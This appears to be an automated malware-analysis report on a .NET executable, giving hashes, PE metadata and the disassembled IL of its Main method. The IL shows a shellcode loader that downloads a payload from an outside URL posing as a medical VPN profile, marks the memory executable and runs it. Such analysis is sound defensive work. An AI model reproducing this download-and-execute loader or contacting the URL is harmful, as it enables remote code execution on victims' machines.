Symbol Obfuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 6587c48966f12eca67de6ab84096888b
|
| Sha1 | 76b8d11e1bb761a6c0e47fea217b14d5d9390e5a
|
| Sha256 | cce5527b07713aba842f089543362723d921231af1e28f844ed7dc64a3ea7c50
|
| Sha384 | 4b09327bda2ef21523ebc6dacaf13ca70c9cbe913596350d41635d7b07acd60a62b6e0c9d2c77d1dfa62adcf42fb0619
|
| Sha512 | 5c12f414b26e53b704bca6972d61b8fc816ac4102072e9fd91b30215d6ef823468099a39e79bbf75b8c226840c75e1eac2e68fbb23021cdd614a490cab8d9130
|
| SSDeep | 48:69/B/oiO706o1/hRHXlX7BI20laT302csjPvDvtEOPulUf0l7WI:iVRP1hRHXvI20laTMstsyf0l
|
| TLSH | 3A815403A7E8166AF0EB177409B7470166B5FC149F37DB6F49E80189ACF17244E63B62
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | dumb.exe |
| Full Name | dumb.exe |
| EntryPoint | System.Void Reflection.Program::Main() |
| Scope Name | dumb.exe |
| Scope Type | ModuleDef |
| Kind | Console |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | dumb |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 1 |
| Main Method | System.Void Reflection.Program::Main() |
| Main IL Instruction Count | 40 |
| Main IL | ldc.i4.1 <null> call System.Void System.Net.ServicePointManager::set_Expect100Continue(System.Boolean) ldc.i4 3072 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) newobj System.Void System.Net.WebClient::.ctor() stloc.0 <null> ldloc.0 <null> ldstr https://downloads.beaconvistamedical.com/vpn-profile.bin callvirt System.Byte[] System.Net.WebClient::DownloadData(System.String) stloc.1 <null> ldloc.1 <null> ldc.i4.3 <null> call System.Runtime.InteropServices.GCHandle System.Runtime.InteropServices.GCHandle::Alloc(System.Object,System.Runtime.InteropServices.GCHandleType) stloc.2 <null> ldloca.s V_2 call System.IntPtr System.Runtime.InteropServices.GCHandle::AddrOfPinnedObject() stloc.3 <null> ldloc.1 <null> ldc.i4.0 <null> ldloc.3 <null> ldloc.1 <null> ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) ldloc.3 <null> ldloc.1 <null> ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldc.i4.s 64 ldloca.s V_4 call System.Boolean Reflection.Program::VirtualProtect(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldloc.3 <null> call Reflection.Program/coolio System.Runtime.InteropServices.Marshal::GetDelegateForFunctionPointer<Reflection.Program/coolio>(System.IntPtr) stloc.s V_5 ldloc.s V_5 callvirt System.Void Reflection.Program/coolio::Invoke() ret <null> |